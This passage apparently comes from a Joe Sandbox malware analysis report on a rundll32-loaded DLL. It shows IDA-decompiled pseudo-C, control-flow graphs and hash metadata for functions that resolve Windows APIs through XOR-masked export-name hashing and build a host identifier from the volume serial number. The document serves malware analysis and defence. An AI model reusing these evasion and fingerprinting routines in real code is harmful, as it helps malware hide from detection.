                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MemoryVirtual$AllocateWrite$FreeHeapProtect
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4171237596-0
                                                                                                                                                                          • Opcode ID: 7688612ed510fc03d4c2a3d6e90536308585b70ac75cbc34e99945c669c61362
                                                                                                                                                                          • Instruction ID: 85762fa87bf84ebb9b60b5ed767da253e99bba6ab009e757f312c963c4a3c12a
                                                                                                                                                                          • Opcode Fuzzy Hash: 7688612ed510fc03d4c2a3d6e90536308585b70ac75cbc34e99945c669c61362
                                                                                                                                                                          • Instruction Fuzzy Hash: DC413F75E00719BFEB40CFA4CD81AAE77F9FB48345F200169F604E7695E770AA418BA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 95 1000a771-1000a79a call 1000cf09 98 1000a7a0-1000a7a2 95->98 99 1000a79c-1000a79e 95->99 100 1000a7a4 98->100 101 1000a7b2-1000a7cb lstrlenW call 1000a650 98->101 99->100 103 1000a7a6-1000a7b0 100->103 105 1000a802-1000a80f call 1000a41e 101->105 106 1000a7cd-1000a7dd call 1000cf09 101->106 103->101 103->103 113 1000a815-1000a818 105->113 114 1000a8e7-1000a8ee call 1000a455 105->114 111 1000a7e5-1000a7ef 106->111 112 1000a7df-1000a7e3 106->112 111->111 115 1000a7f1-1000a7fd lstrlenW 111->115 112->111 112->115 113->114 117 1000a81e-1000a821 113->117 121 1000a8f0-1000a900 call 10009203 114->121 122 1000a902-1000a910 call 10009203 114->122 118 1000a911-1000a915 115->118 120 1000a828-1000a82a 117->120 123 1000a830-1000a84e call 1000936a 120->123 124 1000a8d2-1000a8e1 120->124 121->122 122->118 131 1000a850-1000a855 call 1000e23e 123->131 132 1000a85a-1000a86a call 1000cb78 123->132 124->113 124->114 131->132 136 1000a894-1000a897 132->136 137 1000a86c-1000a883 call 1000a93e 132->137 139 1000a8c2-1000a8cc 136->139 140 1000a899-1000a89b 136->140 137->136 144 1000a885-1000a888 call 1000aa38 137->144 139->120 139->124 141 1000a8ac-1000a8bc 140->141 142 1000a89d-1000a8a3 140->142 141->139 142->141 147 1000a88d-1000a88f 144->147 147->136 148 1000a891-1000a893 147->148 148->136
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000A771(WCHAR* __edx) {
                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                          				WCHAR* _v24;
                                                                                                                                                                          				char _v28;
                                                                                                                                                                          				char _v29;
                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                          				short _v44;
                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                          				signed int _t59;
                                                                                                                                                                          				intOrPtr _t62;
                                                                                                                                                                          				signed int _t64;
                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                          				intOrPtr _t69;
                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                          				signed int _t73;
                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                          				char _t82;
                                                                                                                                                                          				char _t96;
                                                                                                                                                                          				signed int _t98;
                                                                                                                                                                          				char _t99;
                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                          				void* _t104;
                                                                                                                                                                          				void* _t105;
                                                                                                                                                                          
                                                                                                                                                                          				_t97 = __edx;
                                                                                                                                                                          				_t82 = 0;
                                                                                                                                                                          				_v24 = __edx;
                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_t48 = E1000CF09("endless");
                                                                                                                                                                          				_t98 = _t48;
                                                                                                                                                                          				_v29 = 0;
                                                                                                                                                                          				_t100 = 0xf;
                                                                                                                                                                          				if(_t98 <= _t100) {
                                                                                                                                                                          					__eflags = _t98;
                                                                                                                                                                          					if(_t98 == 0) {
                                                                                                                                                                          						goto L5;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L3;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t98 = _t100;
                                                                                                                                                                          					L3:
                                                                                                                                                                          					_t96 = _t82;
                                                                                                                                                                          					do {
                                                                                                                                                                          						_t5 = _t96 + 0x41; // 0x41
                                                                                                                                                                          						 *((char*)(_t104 + _t96 - 0x28)) = _t5;
                                                                                                                                                                          						_t96 = _t96 + 1;
                                                                                                                                                                          					} while (_t96 < _t98);
                                                                                                                                                                          					L5:
                                                                                                                                                                          					lstrlenW( &_v44);
                                                                                                                                                                          					_t99 = E1000A650( &_v20);
                                                                                                                                                                          					_v28 = _t99;
                                                                                                                                                                          					if(_t99 != 0) {
                                                                                                                                                                          						E1000A41E();
                                                                                                                                                                          						_t101 = _v20;
                                                                                                                                                                          						_v16 = _t82;
                                                                                                                                                                          						__eflags = _t101;
                                                                                                                                                                          						if(_t101 == 0) {
                                                                                                                                                                          							L26:
                                                                                                                                                                          							E1000A455();
                                                                                                                                                                          							__eflags = _t101;
                                                                                                                                                                          							if(_t101 == 0) {
                                                                                                                                                                          								L28:
                                                                                                                                                                          								E10009203( &_v28, _t82);
                                                                                                                                                                          								return _v8;
                                                                                                                                                                          							} else {
                                                                                                                                                                          								goto L27;
                                                                                                                                                                          							}
                                                                                                                                                                          							do {
                                                                                                                                                                          								L27:
                                                                                                                                                                          								E10009203(_t99, 0xfffffffe);
                                                                                                                                                                          								_t99 = _t99 + 4;
                                                                                                                                                                          								_t101 = _t101 - 1;
                                                                                                                                                                          								__eflags = _t101;
                                                                                                                                                                          							} while (_t101 != 0);
                                                                                                                                                                          							goto L28;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							goto L11;
                                                                                                                                                                          						}
                                                                                                                                                                          						while(1) {
                                                                                                                                                                          							L11:
                                                                                                                                                                          							__eflags = _v8 - _t82;
                                                                                                                                                                          							if(_v8 != _t82) {
                                                                                                                                                                          								goto L26;
                                                                                                                                                                          							}
                                                                                                                                                                          							_t102 = _v8;
                                                                                                                                                                          							_v12 = 1;
                                                                                                                                                                          							do {
                                                                                                                                                                          								__eflags = _t102;
                                                                                                                                                                          								if(_t102 != 0) {
                                                                                                                                                                          									break;
                                                                                                                                                                          								}
                                                                                                                                                                          								E1000936A( &_v44, _t82, 0x10);
                                                                                                                                                                          								_t62 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          								_t105 = _t105 + 0xc;
                                                                                                                                                                          								__eflags =  *(_t62 + 0x1898) & 0x00000200;
                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                          									E1000E23E(_t82, _t97, __eflags);
                                                                                                                                                                          								}
                                                                                                                                                                          								_t97 =  &_v44;
                                                                                                                                                                          								_t64 = E1000CB78( *((intOrPtr*)(_t99 + _v16 * 4)),  &_v44); // executed
                                                                                                                                                                          								__eflags = _t64;
                                                                                                                                                                          								if(_t64 >= 0) {
                                                                                                                                                                          									_t97 =  &_v44;
                                                                                                                                                                          									_t73 = E1000A93E(0x100013b8,  &_v44, _v24, _v12); // executed
                                                                                                                                                                          									__eflags = _t73;
                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                          										_t74 = E1000AA38( &_v44, __eflags); // executed
                                                                                                                                                                          										__eflags = _t74;
                                                                                                                                                                          										if(_t74 != 0) {
                                                                                                                                                                          											_t102 = 1;
                                                                                                                                                                          											__eflags = 1;
                                                                                                                                                                          										}
                                                                                                                                                                          									}
                                                                                                                                                                          								}
                                                                                                                                                                          								__eflags = _v44 - _t82;
                                                                                                                                                                          								if(_v44 != _t82) {
                                                                                                                                                                          									__eflags = _t102;
                                                                                                                                                                          									if(_t102 == 0) {
                                                                                                                                                                          										_t71 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          										 *((intOrPtr*)(_t71 + 0x114))(_v44, _t82);
                                                                                                                                                                          									}
                                                                                                                                                                          									_t67 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          									 *((intOrPtr*)(_t67 + 0x34))(_v40);
                                                                                                                                                                          									_t69 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          									 *((intOrPtr*)(_t69 + 0x34))(_v44);
                                                                                                                                                                          								}
                                                                                                                                                                          								_t66 = _v12 + 1;
                                                                                                                                                                          								_v12 = _t66;
                                                                                                                                                                          								__eflags = _t66 - 2;
                                                                                                                                                                          							} while (_t66 <= 2);
                                                                                                                                                                          							_t59 = _v16 + 1;
                                                                                                                                                                          							_v8 = _t102;
                                                                                                                                                                          							_t101 = _v20;
                                                                                                                                                                          							_v16 = _t59;
                                                                                                                                                                          							__eflags = _t59 - _t101;
                                                                                                                                                                          							if(_t59 < _t101) {
                                                                                                                                                                          								continue;
                                                                                                                                                                          							}
                                                                                                                                                                          							goto L26;
                                                                                                                                                                          						}
                                                                                                                                                                          						goto L26;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t76 = E1000CF09("appear");
                                                                                                                                                                          					_v29 = _t82;
                                                                                                                                                                          					if(_t76 > _t100) {
                                                                                                                                                                          						do {
                                                                                                                                                                          							L8:
                                                                                                                                                                          							_t12 = _t82 + 0x41; // 0x41
                                                                                                                                                                          							 *((char*)(_t104 + _t82 - 0x28)) = _t12;
                                                                                                                                                                          							_t82 = _t82 + 1;
                                                                                                                                                                          						} while (_t82 < _t100);
                                                                                                                                                                          						L9:
                                                                                                                                                                          						lstrlenW( &_v44);
                                                                                                                                                                          						return 0;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t100 = _t76;
                                                                                                                                                                          					if(_t100 == 0) {
                                                                                                                                                                          						goto L9;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L8;
                                                                                                                                                                          				}
                                                                                                                                                                          			}

































                                                                                                                                                                          0x1000a771
                                                                                                                                                                          0x1000a77a
                                                                                                                                                                          0x1000a77c
                                                                                                                                                                          0x1000a784
                                                                                                                                                                          0x1000a787
                                                                                                                                                                          0x1000a78a
                                                                                                                                                                          0x1000a792
                                                                                                                                                                          0x1000a794
                                                                                                                                                                          0x1000a797
                                                                                                                                                                          0x1000a79a
                                                                                                                                                                          0x1000a7a0
                                                                                                                                                                          0x1000a7a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a79c
                                                                                                                                                                          0x1000a79c
                                                                                                                                                                          0x1000a7a4
                                                                                                                                                                          0x1000a7a4
                                                                                                                                                                          0x1000a7a6
                                                                                                                                                                          0x1000a7a6
                                                                                                                                                                          0x1000a7a9
                                                                                                                                                                          0x1000a7ad
                                                                                                                                                                          0x1000a7ae
                                                                                                                                                                          0x1000a7b2
                                                                                                                                                                          0x1000a7b6
                                                                                                                                                                          0x1000a7c4
                                                                                                                                                                          0x1000a7c6
                                                                                                                                                                          0x1000a7cb
                                                                                                                                                                          0x1000a802
                                                                                                                                                                          0x1000a807
                                                                                                                                                                          0x1000a80a
                                                                                                                                                                          0x1000a80d
                                                                                                                                                                          0x1000a80f
                                                                                                                                                                          0x1000a8e7
                                                                                                                                                                          0x1000a8e7
                                                                                                                                                                          0x1000a8ec
                                                                                                                                                                          0x1000a8ee
                                                                                                                                                                          0x1000a902
                                                                                                                                                                          0x1000a907
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a8f0
                                                                                                                                                                          0x1000a8f0
                                                                                                                                                                          0x1000a8f3
                                                                                                                                                                          0x1000a8f9
                                                                                                                                                                          0x1000a8fd
                                                                                                                                                                          0x1000a8fd
                                                                                                                                                                          0x1000a8fd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a815
                                                                                                                                                                          0x1000a815
                                                                                                                                                                          0x1000a815
                                                                                                                                                                          0x1000a818
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a81e
                                                                                                                                                                          0x1000a821
                                                                                                                                                                          0x1000a828
                                                                                                                                                                          0x1000a828
                                                                                                                                                                          0x1000a82a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a837
                                                                                                                                                                          0x1000a83c
                                                                                                                                                                          0x1000a841
                                                                                                                                                                          0x1000a844
                                                                                                                                                                          0x1000a84e
                                                                                                                                                                          0x1000a855
                                                                                                                                                                          0x1000a855
                                                                                                                                                                          0x1000a85d
                                                                                                                                                                          0x1000a863
                                                                                                                                                                          0x1000a868
                                                                                                                                                                          0x1000a86a
                                                                                                                                                                          0x1000a86f
                                                                                                                                                                          0x1000a87a
                                                                                                                                                                          0x1000a881
                                                                                                                                                                          0x1000a883
                                                                                                                                                                          0x1000a888
                                                                                                                                                                          0x1000a88d
                                                                                                                                                                          0x1000a88f
                                                                                                                                                                          0x1000a893
                                                                                                                                                                          0x1000a893
                                                                                                                                                                          0x1000a893
                                                                                                                                                                          0x1000a88f
                                                                                                                                                                          0x1000a883
                                                                                                                                                                          0x1000a894
                                                                                                                                                                          0x1000a897
                                                                                                                                                                          0x1000a899
                                                                                                                                                                          0x1000a89b
                                                                                                                                                                          0x1000a89d
                                                                                                                                                                          0x1000a8a6
                                                                                                                                                                          0x1000a8a6
                                                                                                                                                                          0x1000a8ac
                                                                                                                                                                          0x1000a8b4
                                                                                                                                                                          0x1000a8b7
                                                                                                                                                                          0x1000a8bf
                                                                                                                                                                          0x1000a8bf
                                                                                                                                                                          0x1000a8c5
                                                                                                                                                                          0x1000a8c6
                                                                                                                                                                          0x1000a8c9
                                                                                                                                                                          0x1000a8c9
                                                                                                                                                                          0x1000a8d5
                                                                                                                                                                          0x1000a8d6
                                                                                                                                                                          0x1000a8d9
                                                                                                                                                                          0x1000a8dc
                                                                                                                                                                          0x1000a8df
                                                                                                                                                                          0x1000a8e1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a8e1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a815
                                                                                                                                                                          0x1000a7d2
                                                                                                                                                                          0x1000a7d7
                                                                                                                                                                          0x1000a7dd
                                                                                                                                                                          0x1000a7e5
                                                                                                                                                                          0x1000a7e5
                                                                                                                                                                          0x1000a7e5
                                                                                                                                                                          0x1000a7e8
                                                                                                                                                                          0x1000a7ec
                                                                                                                                                                          0x1000a7ed
                                                                                                                                                                          0x1000a7f1
                                                                                                                                                                          0x1000a7f5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a7fb
                                                                                                                                                                          0x1000a7df
                                                                                                                                                                          0x1000a7e3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000a7e3

                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 1000A7B6
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,00000001,00000000), ref: 1000A7F5
                                                                                                                                                                            • Part of subcall function 1000936A: memset.MSVCRT ref: 1000937C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$memset
                                                                                                                                                                          • String ID: appear$endless
                                                                                                                                                                          • API String ID: 3887242890-2536025861
                                                                                                                                                                          • Opcode ID: 627b40af1e2a598aed1e1762a6524e174530ae60acb2cf13aabb3c5619ac27c2
                                                                                                                                                                          • Instruction ID: 43acfddb437bd695ff901fa8aaf7fd7f1202ceeadee2dfa3d6f986462457d3c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 627b40af1e2a598aed1e1762a6524e174530ae60acb2cf13aabb3c5619ac27c2
                                                                                                                                                                          • Instruction Fuzzy Hash: 2751A335D002199FEF01DBA4C9859ED77F5EF497D0F254269E900B7249DB309D82CBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 264 100093b8-100093cf 265 100093d1-100093f9 264->265 266 1000942c 264->266 265->266 267 100093fb-1000941e call 1000cf09 call 1000e6e9 265->267 268 1000942e-10009432 266->268 273 10009420-1000942a 267->273 274 10009433-1000944a 267->274 273->266 273->267 275 100094a0-100094a2 274->275 276 1000944c-10009454 274->276 275->268 276->275 277 10009456 276->277 278 10009458-1000945e 277->278 279 10009460-10009462 278->279 280 1000946e-1000947f 278->280 279->280 283 10009464-1000946c 279->283 281 10009481-10009482 280->281 282 10009484-10009490 LoadLibraryA 280->282 281->282 282->266 284 10009492-1000949c GetProcAddress 282->284 283->278 283->280 284->266 285 1000949e 284->285 285->268
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E100093B8(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                          				char _v92;
                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                          				void* _t56;
                                                                                                                                                                          				struct HINSTANCE__* _t58;
                                                                                                                                                                          				_Unknown_base(*)()* _t59;
                                                                                                                                                                          				intOrPtr _t60;
                                                                                                                                                                          				void* _t62;
                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                          				void* _t69;
                                                                                                                                                                          				char _t70;
                                                                                                                                                                          				void* _t75;
                                                                                                                                                                          				CHAR* _t80;
                                                                                                                                                                          				void* _t82;
                                                                                                                                                                          
                                                                                                                                                                          				_t75 = __ecx;
                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                          				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                          				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                          				if(_t41 == 0) {
                                                                                                                                                                          					L4:
                                                                                                                                                                          					return 0;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t62 = _t41 + __ecx;
                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                          				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                          				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                          				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                          				_t47 = 0;
                                                                                                                                                                          				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_v16 = _t63;
                                                                                                                                                                          				if(_t63 == 0) {
                                                                                                                                                                          					goto L4;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					goto L2;
                                                                                                                                                                          				}
                                                                                                                                                                          				while(1) {
                                                                                                                                                                          					L2:
                                                                                                                                                                          					_t49 = E1000E6E9( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000CF09( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                          					_t51 = _v8;
                                                                                                                                                                          					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                          						break;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t73 = _v20;
                                                                                                                                                                          					_t47 = _t51 + 1;
                                                                                                                                                                          					_v8 = _t47;
                                                                                                                                                                          					if(_t47 < _v16) {
                                                                                                                                                                          						continue;
                                                                                                                                                                          					}
                                                                                                                                                                          					goto L4;
                                                                                                                                                                          				}
                                                                                                                                                                          				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                          				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                          				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                          					return _t80;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t56 = 0;
                                                                                                                                                                          					while(1) {
                                                                                                                                                                          						_t70 = _t80[_t56];
                                                                                                                                                                          						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                          						_t56 = _t56 + 1;
                                                                                                                                                                          						if(_t56 < 0x40) {
                                                                                                                                                                          							continue;
                                                                                                                                                                          						}
                                                                                                                                                                          						break;
                                                                                                                                                                          					}
                                                                                                                                                                          					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                          					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                          					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                          						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                          					}
                                                                                                                                                                          					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                          					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                          					if(_t58 == 0) {
                                                                                                                                                                          						goto L4;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                          					if(_t59 == 0) {
                                                                                                                                                                          						goto L4;
                                                                                                                                                                          					}
                                                                                                                                                                          					return _t59;
                                                                                                                                                                          				}
                                                                                                                                                                          			}

























                                                                                                                                                                          0x100093c1
                                                                                                                                                                          0x100093c3
                                                                                                                                                                          0x100093c6
                                                                                                                                                                          0x100093c9
                                                                                                                                                                          0x100093cf
                                                                                                                                                                          0x1000942c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000942c
                                                                                                                                                                          0x100093d1
                                                                                                                                                                          0x100093dc
                                                                                                                                                                          0x100093df
                                                                                                                                                                          0x100093e4
                                                                                                                                                                          0x100093e9
                                                                                                                                                                          0x100093ec
                                                                                                                                                                          0x100093ee
                                                                                                                                                                          0x100093f1
                                                                                                                                                                          0x100093f4
                                                                                                                                                                          0x100093f9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100093fb
                                                                                                                                                                          0x100093fb
                                                                                                                                                                          0x1000940d
                                                                                                                                                                          0x1000941a
                                                                                                                                                                          0x1000941e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009420
                                                                                                                                                                          0x10009423
                                                                                                                                                                          0x10009424
                                                                                                                                                                          0x1000942a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000942a
                                                                                                                                                                          0x10009441
                                                                                                                                                                          0x10009446
                                                                                                                                                                          0x1000944a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009456
                                                                                                                                                                          0x10009456
                                                                                                                                                                          0x10009458
                                                                                                                                                                          0x10009458
                                                                                                                                                                          0x1000945e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009464
                                                                                                                                                                          0x10009468
                                                                                                                                                                          0x1000946c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000946c
                                                                                                                                                                          0x10009472
                                                                                                                                                                          0x1000947a
                                                                                                                                                                          0x1000947f
                                                                                                                                                                          0x10009482
                                                                                                                                                                          0x10009482
                                                                                                                                                                          0x10009484
                                                                                                                                                                          0x10009488
                                                                                                                                                                          0x10009490
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10009494
                                                                                                                                                                          0x1000949c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000949c

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(.dll,?,00000144,00000000), ref: 10009488
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10009494
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                          • String ID: .dll
                                                                                                                                                                          • API String ID: 2574300362-2738580789
                                                                                                                                                                          • Opcode ID: 251132edf76c9627c3837873b86921716ba1d3e6ac5b7bb83e19cbcdd929cc08
                                                                                                                                                                          • Instruction ID: 5f7767ba692d8623afc008dab85022027fb0ad9a9831507a7d1254af1b27c92f
                                                                                                                                                                          • Opcode Fuzzy Hash: 251132edf76c9627c3837873b86921716ba1d3e6ac5b7bb83e19cbcdd929cc08
                                                                                                                                                                          • Instruction Fuzzy Hash: 6631F175A002158BEF54CFA9D880AAEBBF5FF45384F2444A9D845E734AD730ED82CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                          			E1000D131(WCHAR* __ecx, WCHAR* __edx, void* __eflags) {
                                                                                                                                                                          				long _v8;
                                                                                                                                                                          				long _v12;
                                                                                                                                                                          				WCHAR* _v16;
                                                                                                                                                                          				char _v528;
                                                                                                                                                                          				short _v1040;
                                                                                                                                                                          				short _v1552;
                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                          				WCHAR* _t26;
                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                          				void* _t32;
                                                                                                                                                                          				long _t37;
                                                                                                                                                                          				WCHAR* _t42;
                                                                                                                                                                          				WCHAR* _t57;
                                                                                                                                                                          				void* _t60;
                                                                                                                                                                          
                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                          				_t42 = __edx;
                                                                                                                                                                          				_t57 = __ecx;
                                                                                                                                                                          				E1000936A(__edx, 0, 0x100);
                                                                                                                                                                          				_v12 = 0x100;
                                                                                                                                                                          				_t23 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          				 *((intOrPtr*)(_t23 + 0xc0))( &_v12);
                                                                                                                                                                          				E1000C229(__edx,  &_v528, 0x100);
                                                                                                                                                                          				 *((intOrPtr*)(_t60 + 0xc)) = 0x331;
                                                                                                                                                                          				_t26 = E100091B2(__edx,  &_v528);
                                                                                                                                                                          				_v16 = _t26;
                                                                                                                                                                          				_t28 = GetVolumeInformationW(_t26,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                          				_v8 = _v8 &  ~_t28;
                                                                                                                                                                          				E10009E2E( &_v16);
                                                                                                                                                                          				_t32 = E1000CF22(_t42);
                                                                                                                                                                          				E1000C172( &(_t42[E1000CF22(_t42)]), 0x100 - _t32, L"%u", _v8);
                                                                                                                                                                          				lstrcatW(_t42, _t57);
                                                                                                                                                                          				_t37 = E1000CF22(_t42);
                                                                                                                                                                          				_v12 = _t37;
                                                                                                                                                                          				CharUpperBuffW(_t42, _t37);
                                                                                                                                                                          				return E1000E6E9(_t42, E1000CF22(_t42) + _t39, 0);
                                                                                                                                                                          			}

















                                                                                                                                                                          0x1000d13a
